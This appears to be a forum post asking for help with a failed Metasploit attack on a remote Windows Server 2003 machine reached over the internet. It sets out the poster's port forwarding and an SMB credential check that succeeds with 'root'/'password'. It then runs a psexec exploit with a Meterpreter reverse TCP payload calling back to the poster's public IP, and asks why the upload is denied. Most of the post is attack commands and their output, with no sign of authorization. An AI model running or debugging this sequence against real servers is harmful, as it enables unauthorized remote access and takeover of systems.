Target OS: Windows 2003 SP2 EN
Target public ip : XX.XX.XX.XX
Target Open port: 445
My OS: windows 7
My public ip : YY.YY.YY.YY
my local ip: 192.168.2.42
my router SMC
Due to the fact that the target is not on the same LAN, and the attach will be over the internet, i start with setting port forward from router settings as the following:
Name:AUTH - Protocol:TCP/UDP - WAN Port:4444 - Server Host Port:4444 - Server IP Address 192.168.2.42
I installed metasploit and start with checking if the credentials are valid or not by running scanner/smb/smb_login as following
msf> use scanner/smb/smb_login
msf auxiliary(smb_login) > set rhosts XX.XX.XX.XX
rhosts => XX.XX.XX.XX
msf auxiliary(smb_login) > set smbuser root
smbuser => root
msf auxiliary(smb_login) > set smbpass password
smbpass => password
msf auxiliary(smb_login) > run
[*] XX.XX.XX.XX:445 SMB - Starting SMB login bruteforce
[-] XX.XX.XX.XX - This system allows guest sessions with any credentials, these instances will not be reported.
[-] XX.XX.XX.XX:445 SMB - [1/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : (STATUS_LOGON_FAILURE)
[-] XX.XX.XX.XX:445 SMB - [2/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : root (STATUS_LOGON_FAILURE)
[*] Auth-User: "root"
[+] XX.XX.XX.XX:445|WORKGROUP - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2) 'root' : 'password'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
then after login successful, i try to use exploit/windows/smb/psexec to exploit the server by the following:
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost XX.XX.XX.XX
rhost => XX.XX.XX.XX
msf exploit(psexec) > set smbuser root
smbuser => root
msf exploit(psexec) > set smbpass password
smbpass => password
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set lhost YY.YY.YY.YY
lhost => YY.YY.YY.YY
msf exploit(psexec) > set lport 4444
lport => 4444
msf exploit(psexec) > exploit
[-] Handler failed to bind to YY.YY.YY.YY:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Connecting to the server...
[*] Authenticating to XX.XX.XX.XX:445|WORKGROUP as user 'root'...
[*] Uploading payload...
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)
but as you see the exploit failed although the credentials are valid and confirmed above, can you help me understand what's wrong on the above?